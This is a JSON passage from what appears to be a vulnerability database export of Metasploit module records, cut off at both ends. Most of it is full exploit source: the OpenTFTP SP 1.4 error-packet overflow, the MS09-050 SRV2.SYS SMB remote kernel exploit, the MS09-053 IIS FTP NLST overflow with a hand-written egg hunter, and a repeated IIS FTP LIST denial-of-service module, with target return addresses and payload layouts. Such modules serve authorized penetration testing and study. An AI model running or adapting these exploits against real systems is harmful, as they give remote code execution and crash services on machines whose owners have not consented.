{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/TFTP/OPENTFTP_ERROR_CODE"]}], "modified": "2019-08-19T19:20:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/tftp/opentftp_error_code.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'OpenTFTP SP 1.4 Error Packet Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable\n condition triggers when the TFTP opcode is configured as an error packet, the TFTP\n service will then format the message using a sprintf() function, which causes an\n overflow, therefore allowing remote code execution under the context of SYSTEM.\n\n The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone',\n or 'Service'). By default the target is set to 'Service' because that's the default\n configuration during OpenTFTP Server SP 1.4's installation.\n },\n 'Author' =>\n [\n 'tixxDZ', #Initial discovery, poc\n 'steponequit' #Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2008-2161'],\n ['OSVDB', '44904'],\n ['BID', '29111'],\n ['URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 5000,\n 'BadChars' => \"\\x00\\x0a\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #.bss section that is overwritten\n [ 'OpenTFTP 1.4 Service', { 'Ret' => 0x0041b3ab } ],\n [ 'OpenTFTP 1.4 Stand Alone', { 'Ret' => 0x0041b3ab } ]\n\n ],\n #TFTP server is installed as an NT service by default\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => 'Jul 05 2008'))\n\n register_options(\n [\n Opt::RPORT(69),\n ])\n end\n\n def exploit\n\n if target.name =~ /OpenTFTP 1.4 Stand Alone/\n # This hits msvcrt.printf()\n sploit = \"\\x00\\x05\" + make_nops(10)\n sploit << payload.encoded\n sploit << rand_text_alpha(20517 - payload.encoded.length)\n sploit << [target['Ret']].pack('V')\n sploit << Rex::Text.rand_text_alpha(1469)\n\n elsif target.name =~ /OpenTFTP 1.4 Service/\n #This hits time()\n sploit = \"\\x00\\x05\" + make_nops(10)\n sploit << payload.encoded\n sploit << rand_text_alpha(20445 - payload.encoded.length)\n sploit << [target['Ret']].pack('V')\n sploit << Rex::Text.rand_text_alpha(1545)\n end\n\n # Send the malicious packet\n connect_udp\n udp_sock.put(sploit)\n handler\n disconnect_udp\n\n end\nend\n\n=begin\nNOTE: If the module is run on a OSX box, you will probably see this error:\n[-] Exploit exception: Message too long\nThat's OSX for you.\n\nThe vulnerable condition triggers when the TFTP opcode \"\\x00\\x05\" gets parsed in a ntohs() call:\n.text:004022F6 mov eax, ds:dword_41B370\n.text:004022FB movzx eax, word ptr [eax]\n.text:004022FE mov [esp+5C8h+var_5C8], eax\n.text:00402301 mov [ebp+var_550], 0FFFFFFFFh\n.text:0040230B call ntohs\n.text:00402310 sub esp, 4\n.text:00402313 cmp ax, 5\n.text:00402317 jnz short loc_40236F\n...\n\nWhen the value matches 0x05, we then head down to a sprinf() function to generate an error\nmessage, which causes an overflow:\n.text:00402330 mov eax, ds:dword_41B370\n.text:00402335 add eax, 4\n.text:00402338 mov [esp+5C8h+var_5BC], eax\n.text:0040233C mov [esp+5C8h+var_5C0], edx\n.text:00402340 mov [esp+5C8h+var_5C4], offset aErrorIAtClient ; \"Error %i at Client, %s\"\n.text:00402348 mov [esp+5C8h+var_5C8], offset byte_41B394\n.text:0040234F call sprintf\n\nAnd then we either corrupt a msvcrt.printf() or time() call (in logMess), which end up gaining\ncontrol.\n\nIn source:\nhttp://pastebin.com/QgZDwcan\n\nelse if (ntohs(datain->opcode) == 5) // Line 224\n{\n sprintf(serverError.errormessage, \"Error %i at Client, %s\", ntohs(datain->block), &datain->buffer);\n logMess(req1, 1);\n ..... so on .....\n\nYou can also corrupt a SetServiceStatus() call with a smaller buffer, but obviously doesn't\ngive you a better crash than this one.\n=end\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-19T19:20:43", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 94}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-08-19T20:05:22", "history": [], "viewCount": 129, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-08-19T20:05:22"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-08-19T20:05:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-19T20:05:22", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 95}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "2ebe361c7cde9c24289f12812ad4fabf", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.\n", "published": "2010-02-26T13:42:17", "modified": "2019-05-23T12:01:21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103", "https://seclists.org/fulldisclosure/2009/Sep/0039.html"], "cvelist": ["CVE-2009-3103"], "lastseen": "2019-08-25T02:50:47", "history": [], "viewCount": 129, "enchantments": {"score": {"value": 9.2, "vector": "NONE", "modified": "2019-08-25T02:50:47"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3103"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:81723", "PACKETSTORM:86712"]}, {"type": "threatpost", "idList": ["THREATPOST:9C5AF36512145E9639AF7CB83F66B032", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D"]}, {"type": "saint", "idList": ["SAINT:214C8A991DD5F17EF7735584268D3CB3", "SAINT:30D79D30A079078FDE7DB3C5C56D3681", "SAINT:1E9A2A7C6228790D4846596C8DA04D49"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-CVE2009-3103.NSE"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS09_050_SMB2_NEGOTIATE_FUNC_INDEX", "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS09_050_SMB2_SESSION_LOGOFF", "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS09_050_SMB2_NEGOTIATE_PIDHIGH"]}, {"type": "openvas", "idList": ["OPENVAS:801287", "OPENVAS:1361412562310104116", "OPENVAS:104116", "OPENVAS:100283", "OPENVAS:803571", "OPENVAS:1361412562310100283", "OPENVAS:1361412562310900965", "OPENVAS:1361412562310801287", "OPENVAS:1361412562310803571"]}, {"type": "canvas", "idList": ["SMB2_NEGOTIATE_REMOTE", "SMB2_NEGOTIATE_LOCAL"]}, {"type": "exploitdb", "idList": ["EDB-ID:16363", "EDB-ID:10005", "EDB-ID:9594", "EDB-ID:12524", "EDB-ID:14674", "EDB-ID:40280"]}, {"type": "seebug", "idList": ["SSV:12474"]}, {"type": "cert", "idList": ["VU:135940"]}, {"type": "nessus", "idList": ["SMB2_PID_HIGH_VULN.NASL", "SMB_NT_MS09-050.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22607"]}, {"type": "mskb", "idList": ["KB975517"]}, {"type": "zdt", "idList": ["1337DAY-ID-25384"]}], "modified": "2019-08-25T02:50:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::KernelMode\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',\n 'Description' => %q{\n This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.\n },\n\n 'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm', 'sf' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'MSB', 'MS09-050' ],\n [ 'CVE', '2009-3103' ],\n [ 'BID', '36299' ],\n [ 'OSVDB', '57799' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2009/Sep/0039.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'StackAdjustment' => -3500,\n 'DisableNops' => true,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n 'ExtendedOptions' =>\n {\n 'Stager' => 'stager_sysenter_hook',\n }\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows Vista SP1/SP2 and Server 2008 (x86)',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X86 ],\n 'Ret' => 0xFFD00D09, # \"POP ESI; RET\" from the kernels HAL memory region ...no ASLR :)\n 'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).\n 'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer\n 'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 07 2009'\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptInt.new( 'WAIT', [ true, \"The number of seconds to wait for the attack to complete.\", 180 ] )\n ])\n end\n\n # Not reliable enough for automation yet\n def autofilter\n false\n end\n\n def exploit\n print_status( \"Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})...\" )\n connect\n\n # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest\n # and srv2!SrvProcPartialCompleteCompoundedRequest\n dialects = [ [ target['ReadAddress'] ].pack(\"V\") * 25, \"SMB 2.002\" ]\n\n data = dialects.collect { |dialect| \"\\x02\" + dialect + \"\\x00\" }.join('')\n data += [ 0x00000000 ].pack(\"V\") * 37 # Must be NULL's\n data += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)\n data += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34\n data += [ 0x42424242 ].pack(\"V\") * 7 # Unused\n data += [ target['MagicIndex'] ].pack(\"V\") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)\n data += [ 0x41414141 ].pack(\"V\") * 6 # Unused\n data += [ target.ret ].pack(\"V\") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2\n data += payload.encoded # Our ring0 -> ring3 shellcode\n\n # We gain code execution by returning into the SMB packet, begining with its header.\n # The SMB packets Magic Header value is 0xFF534D42 which assembles to \"CALL DWORD PTR [EBX+0x4D]; INC EDX\"\n # This will cause an access violation if executed as we can never set EBX to a valid pointer.\n # To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.\n # This assembles to \"ADD BYTE PTR [EBP+ECX*2+0x42], DL\" which is fine as ECX will be zero and EBP is a vaild pointer.\n # We patch the Signature1 value to be a jump forward into our shellcode.\n packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct\n packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE\n packet['Payload']['SMB'].v['Flags1'] = 0x18\n packet['Payload']['SMB'].v['Flags2'] = 0xC853\n packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']\n packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # \"JMP DWORD 0x15D\" ; jump into our ring0 payload.\n packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...\n packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )\n packet['Payload'].v['Payload'] = data\n\n packet = packet.to_s\n\n print_status( \"Sending the exploit packet (#{packet.length} bytes)...\" )\n sock.put( packet )\n\n\n wtime = datastore['WAIT'].to_i\n print_status( \"Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger...\" )\n stime = Time.now.to_i\n\n\n poke_logins = %W{Guest Administrator}\n poke_logins.each do |login|\n begin\n sec = connect(false)\n sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))\n rescue ::Exception => e\n sec.socket.close\n end\n end\n\n while( stime + wtime > Time.now.to_i )\n select(nil, nil, nil, 0.25)\n break if session_created?\n end\n\n handler\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-25T02:50:47", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 96}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-08-25T04:51:42", "history": [], "viewCount": 131, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-08-25T04:51:42"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "mskb", "idList": ["KB975254"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-08-25T04:51:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-25T04:51:42", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 97}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "6d48ff2fe4fa54c3166e9e6d0b34ba6a", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS09-053 Microsoft IIS FTP Server NLST Response Overflow", "description": "This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account)\n", "published": "2010-10-05T23:39:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3023"], "cvelist": ["CVE-2009-3023"], "lastseen": "2019-09-07T15:33:28", "history": [], "viewCount": 131, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2019-09-07T15:33:28"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3023"]}, {"type": "exploitdb", "idList": ["EDB-ID:9541", "EDB-ID:16740", "EDB-ID:9559"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:94532"]}, {"type": "seebug", "idList": ["SSV:12175", "SSV:12476"]}, {"type": "saint", "idList": ["SAINT:54344E071A068774A374DCE7F7795E80", "SAINT:38542AFE78DE33F6BB0AF7E6A3C90956", "SAINT:4EB4CF34422D02BCBF715C4ACFAC8C99"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/MS09_053_FTPD_NLST"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310100952", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "canvas", "idList": ["IISFTP_NLST"]}, {"type": "nessus", "idList": ["IIS5_FTP_OVERFLOW.NASL", "SMB_NT_MS09-053.NASL"]}, {"type": "mskb", "idList": ["KB975254"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892148"]}], "modified": "2019-09-07T15:33:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS09-053 Microsoft IIS FTP Server NLST Response Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP\n service. The flaw is triggered when a special NLST argument is passed\n while the session has changed into a long directory path. For this exploit\n to work, the FTP server must be configured to allow write access to the\n file system (either anonymously or in conjunction with a real account)\n },\n 'Author' => [ 'Kingcope <kcope2[at]googlemail.com>', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['EDB', '9541'],\n ['CVE', '2009-3023'],\n ['OSVDB', '57589'],\n ['BID', '36189'],\n ['MSB', 'MS09-053'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 490,\n 'BadChars' => \"\\x00\\x09\\x0c\\x20\\x0a\\x0d\\x0b\",\n # This is for the stored payload, the real BadChar list for file paths is:\n # \\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20\\x22\\x2a\\x2e\\x2f\\x3a\\x3c\\x3e\\x3f\\x5c\\x7c\n 'StackAdjustment' => -3500,\n },\n 'Platform' => [ 'win' ],\n 'Targets' =>\n [\n [\n 'Windows 2000 SP4 English/Italian (IIS 5.0)',\n {\n 'Ret' => 0x773d24eb, # jmp esp in activeds.dll (English / 5.0.2195.6601)\n 'Patch' => 0x7ffd7ffd # works for off-by-two alignment\n },\n ],\n [\n 'Windows 2000 SP3 English (IIS 5.0)',\n {\n 'Ret' => 0x77e42ed8, # jmp esp in user32.dll (English / 5.0.2195.7032)\n 'Patch' => 0x7ffd7ffd # works for off-by-two alignment\n },\n ],\n [\n # target from TomokiSanaki\n 'Windows 2000 SP0-SP3 Japanese (IIS 5.0)',\n {\n 'Ret' => 0x774fa593, # jmp esp in ?? (Japanese)\n 'Patch' => 0x7ffd7ffd # works for off-by-two alignment\n },\n ],\n ],\n 'DisclosureDate' => 'Aug 31 2009',\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(21),])\n end\n\n\n def exploit\n connect_login\n\n\n based = rand_text_alpha_upper(10)\n\n res = send_cmd( ['MKD', based ], true )\n print_status(res.strip)\n\n if (res !~ /directory created/)\n print_error(\"The root directory of the FTP server is not writeable\")\n disconnect\n return\n end\n\n res = send_cmd( ['CWD', based ], true )\n print_status(res.strip)\n\n egg = rand_text_alpha_upper(4)\n hun = \"\\xB8\\x55\\x55\\x52\\x55\\x35\\x55\\x55\\x55\\x55\\x40\\x81\\x38#{egg}\\x75\\xF7\\x40\\x40\\x40\\x40\\xFF\\xE0\"\n\n # This egg hunter is necessary because of the huge set of restricted characters for directory names\n # The best that metasploit could so was 133 bytes for an alphanum encoded egg hunter\n # The egg hunter above was written by kcope and searches from 0x70000 forward (stack) in order\n # to locate the real shellcode. The only change from the original hunter was to randomize the\n # prefix used.\n\n # Store our real shellcode on the stack\n 1.upto(5) do\n res = send_cmd( ['SITE', egg + payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\") ], true )\n end\n\n # Create the directory path that will be used in the overflow\n pre = rand_text_alpha_upper(3) # esp+0x28 points here\n pst = rand_text_alpha_upper(210) # limited by max path\n\n pst[ 0, hun.length] = hun # 